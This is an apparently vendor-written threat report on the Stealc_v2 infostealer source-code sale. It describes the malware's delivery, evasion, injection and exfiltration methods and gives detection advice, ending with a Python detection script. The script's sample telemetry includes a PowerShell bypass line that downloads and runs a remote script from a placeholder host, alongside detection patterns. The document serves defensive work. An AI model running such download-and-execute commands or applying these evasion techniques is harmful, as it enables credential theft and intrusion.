
June 20, 2026
The alleged sale of the Stealc_v2 information-stealing malware source code on the exploit.in forum introduces major corporate security challenges. Featuring a PHP administration panel, customizable builders, and Telegram bot integrations, this leak enables rapid deployment of stealthy credential-harvesting campaigns.


Distributed via phishing, SEO-poisoned search results, trojanized software downloads, ClickFix, or weaponized 3D Blender assets.
Dropper executed via lightweight PowerShell scripts (e.g., lola.ps1) or MSI packages.
Binary size is heavily padded up to 1GB with junk data to bypass size limitations on automated security scanners.
Dynamically resolves NtAPI/WinAPI (VirtualAlloc, NtProtectVirtualMemory, NtWriteVirtualMemory) to inject shellcode.
Exfiltrates raw browser databases, master keys, and tokens to C2. Decryption is processed entirely server-side to bypass local app security.
If your team may be exposed to a similar threat, FemtoSec can help validate blast radius, prioritize remediation, and connect the issue to a practical security program.
The sale of the complete source code for the Stealc_v2 information-stealing malware on the exploit.in underground forum has triggered a significant shift in the digital threat environment. This listing, which includes the web administrative panel, the payload builders, and a custom Telegram bot generation utility, essentially commoditizes a highly effective credential-harvesting tool. By obtaining the raw source code, lower-tier threat actors can bypass the traditional Malware-as-a-Service subscription fees and deploy independent, highly customized infrastructure to target corporate environments globally. Originally designed under a subscription model by the developer known as plymouth, Stealc has been a persistent risk to corporate endpoints since its inception. The transition of this updated second-version codebase into an open-sale format means security teams must prepare for an immediate surge in customized variants and evasion techniques. As threat actors acquire the core code, they can easily adapt its evasion mechanisms, change network signatures, and target specific administrative and financial portals unique to high-value enterprises.
If an endpoint is confirmed to be compromised by Stealc_v2, immediate isolation is critical. Security administrators must disconnect the compromised workstation from the corporate network to prevent lateral movement. Simultaneously, they must terminate all active OAuth tokens, cloud service sessions, and single sign-on sessions associated with the user accounts on that device. Finally, enforce full password rotation for all personal and corporate applications that were stored or used on the compromised machine. To determine whether your enterprise assets have already been compromised and listed on underground markets, organizations must look outward. FemtoSec provides dedicated Dark Web Monitoring to continuously scan underground forums, channels, and logs for leaked corporate credentials.
The emergence of Stealc_v2 represents a deliberate technical shift in how modern infostealers handle exfiltrated data. In standard infostealers, raw browser database files are decrypted locally on the victim system before the extracted credentials are sent to the command and control server. Stealc_v2 changes this flow by exfiltrating the raw, encrypted browser databases, the associated session cookies, and the corresponding master keys directly to the centralized command and control server. By performing the decryption on the server side, the malware avoids triggering endpoint detection and response alerts that typically monitor runtime decryption operations on the host. This technique also directly aims to bypass Google's App-Bound Encryption defenses, which restrict local decryption of browser-stored credentials to the original program context. Threat actors hosting their own administrative panels can now orchestrate large-scale decryption operations remotely, translating raw stealer logs into plain-text credentials without leaving a substantial footprint on the compromised host.
To defend enterprise networks against Stealc_v2, security teams must understand the complete, step-by-step attack lifecycle. The malware utilizes a modular delivery system combined with aggressive defense evasion mechanisms to establish a foothold and exfiltrate highly sensitive session data.
Initial compromise typically relies on high-fidelity social engineering, SEO poisoning, or compromised software distributions. Threat actors often distribute the malware as trojanized professional software, disguised as cracked versions of popular design and editing packages. Another major vector includes weaponized 3D assets uploaded to public repositories that execute embedded scripts immediately upon opening. Additionally, web-based ClickFix attack paths are used to trick users into running PowerShell scripts disguised as mandatory browser updates.
Once a user executes the initial file, a lightweight downloader script is initiated. A common payload vector observed in these campaigns is a PowerShell wrapper designed to run with the execution policy bypassed. To evade automated sandbox analysis, the threat actors apply binary padding to the main Stealc_v2 executable. By inflating the binary with junk bytes, the file size often exceeds 100MB or even 1GB. Because many traditional antivirus scanners skip files over a certain size to conserve system resources, this simple technique frequently succeeds in slipping past perimeter defenses.
After bypassing the primary file scanners, the loader resolves critical Windows API functions dynamically. Using direct syscalls to sidestep the user-mode API hooks on which many monitoring tools rely, the malware interacts directly with the kernel to allocate memory and inject its core payload. Standard APIs utilized during this phase include VirtualAlloc and NtProtectVirtualMemory to prepare memory regions for shellcode, NtWriteVirtualMemory to inject the decrypted payload into a legitimate system process, and CreateThread to execute the payload within the context of the target process.
Once memory injection is complete, the malware actively scans the user profile directory to locate and harvest credentials, cryptocurrency wallets, and communication histories. The primary targets include autofill data from over 20 Chromium and Gecko-based browsers, desktop session tokens for platforms like Telegram and Discord, and private keys from active cryptocurrency extensions. The malware also features a built-in module designed to capture full-screen screenshots across multiple active monitors, providing attackers with immediate visual context of the victim's workspace.
The harvested data is quickly compressed into an encrypted archive and prepared for exfiltration. In previous versions, exfiltration occurred exclusively via direct HTTP POST requests to customized web endpoints. With the inclusion of the Telegram bot builder in the Stealc_v2 source code leak, operators can now program the malware to send real-time notifications directly to their private Telegram channels. Whenever a user with high-privileged credentials or significant cryptocurrency assets is compromised, the operator receives an immediate, automated alert detailing the stolen data.
The proliferation of Stealc_v2 source code represents an acute threat to corporate identity management. Traditional multi-factor authentication systems often fall short when confronting modern session hijacking attacks. Because infostealers harvest active session cookies alongside standard username and password combinations, attackers can import these stolen cookies directly into their own browsers. This technique allows them to bypass the multi-factor authentication prompt entirely, as the target service recognizes the session as already validated. For organizations in the GCC region, safeguarding endpoints against these targeted campaigns is paramount. To evaluate your organization's resilience against these evasive memory injection techniques, conducting targeted Penetration Testing is highly recommended. These proactive assessments simulate real-world infostealer behaviors and loader patterns to ensure endpoint detection mechanisms are properly tuned.
Defending against Stealc_v2 requires a multi-layered security strategy focused on behavioral monitoring, application control, and proactive network threat hunting.
Security operations centers should implement specific detection logic to identify the distinctive behaviors associated with the loader and the payload. Teams should create endpoint rules that alert on unsigned executables exceeding 100MB in size, especially when launched from local folders. It is also critical to alert on any PowerShell processes executing with execution policy bypass parameters combined with download-string commands. Furthermore, configure Endpoint Detection and Response systems to flag processes that dynamically resolve sensitive virtual memory manipulation APIs outside of standard compiler behaviors.
Organizations should continuously monitor for outbound network connections directed at unusual PHP endpoints, particularly those containing randomized hexadecimal paths. Additionally, blocking outbound communication from corporate workstations to the Telegram Bot API is an effective containment step to prevent operators from receiving exfiltrated alerts.
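As an added example (not code from the original article or from FemtoSec), the following Python script applies the endpoint and network detection logic described in the two preceding paragraphs to a handful of constructed telemetry events modelled loosely on Sysmon process-creation and network-connection fields; every image path, size, host and URL is invented for illustration.

```python
import re

# Constructed sample telemetry (not taken from the article), loosely modelled on
# Sysmon process-creation and network-connection events.
SAMPLE_EVENTS = [
    {"type": "process", "signed": False, "size_mb": 640,
     "image": r"C:\Users\alice\Downloads\asset_pack.exe", "cmdline": "asset_pack.exe"},
    {"type": "process", "signed": True, "size_mb": 0.4,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -w hidden -c "
                "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/lola.ps1')\""},
    {"type": "process", "signed": True, "size_mb": 45, "image": r"C:\Program Files\Vendor\app.exe", "cmdline": "app.exe"},
    {"type": "network", "image": r"C:\Users\alice\AppData\Local\Temp\svc.exe",
     "dest_host": "api.telegram.org", "url": "https://api.telegram.org/bot0000:PLACEHOLDER/sendMessage"},
    {"type": "network", "image": r"C:\Users\alice\AppData\Local\Temp\svc.exe",
     "dest_host": "203.0.113.10", "url": "http://203.0.113.10/9a3f1c7e2b4d6f80/gate.php"},
    {"type": "network", "image": r"C:\Program Files\Vendor\app.exe",
     "dest_host": "updates.example.com", "url": "https://updates.example.com/check.php"},
]

USER_PATH = re.compile(r"^[A-Za-z]:\\Users\\", re.I)             # launched from a user profile
PS_IMAGE = re.compile(r"\\(?:powershell|pwsh)\.exe$", re.I)
PS_BYPASS = re.compile(r"-(?:ExecutionPolicy|ep)\s+Bypass", re.I)
PS_DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)
HEX_PHP_PATH = re.compile(r"/[0-9a-f]{12,}/[^/?]+\.php(?:$|\?)", re.I)  # random hex dir + .php

def padded_unsigned_binary(ev):
    """Unsigned executable over 100MB started from a user-profile folder (binary padding)."""
    return not ev["signed"] and ev["size_mb"] > 100 and bool(USER_PATH.match(ev["image"]))

def powershell_bypass_download(ev):
    """PowerShell with an execution-policy bypass combined with a download cmdlet or method."""
    return bool(PS_IMAGE.search(ev["image"]) and PS_BYPASS.search(ev["cmdline"]) and PS_DOWNLOAD.search(ev["cmdline"]))

def telegram_bot_api(ev):
    return ev["dest_host"].lower() == "api.telegram.org"  # workstation talking to the Bot API

def php_hex_path_beacon(ev):
    return bool(HEX_PHP_PATH.search(ev["url"]))  # PHP endpoint under a long hex path segment

RULES = [("padded_unsigned_binary", "process", padded_unsigned_binary),
         ("powershell_bypass_download", "process", powershell_bypass_download),
         ("telegram_bot_api", "network", telegram_bot_api),
         ("php_hex_path_beacon", "network", php_hex_path_beacon)]

def triage(events):
    """Return (rule name, image) pairs for every event that matches a rule of its type."""
    return [(name, ev["image"]) for ev in events
            for name, etype, rule in RULES if ev["type"] == etype and rule(ev)]
```

Running `triage(SAMPLE_EVENTS)` flags the oversized unsigned download, the PowerShell downloader, and both suspicious connections from svc.exe, while the signed vendor application and its plain check.php update request produce no hits.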